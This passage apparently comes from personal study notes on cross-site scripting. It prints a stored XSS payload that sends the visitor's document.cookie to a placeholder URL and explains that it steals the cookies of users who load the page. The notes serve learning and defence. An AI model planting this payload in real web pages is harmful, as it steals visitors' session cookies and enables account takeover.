OmarMiniesy/Notes/Security/Web Application Security/Cross Site Scripting (XSS).md

 <script>document.location='URL-to-send-to/'+document.cookie</script>
 ```
 > This is a stored attack, meaning it will be put in a place where users visit, so their cookies are stolen and sent to that website URL.

+> The subdomain of the cookie should be the same as the subdomain of the website in which the cookie is.

 ---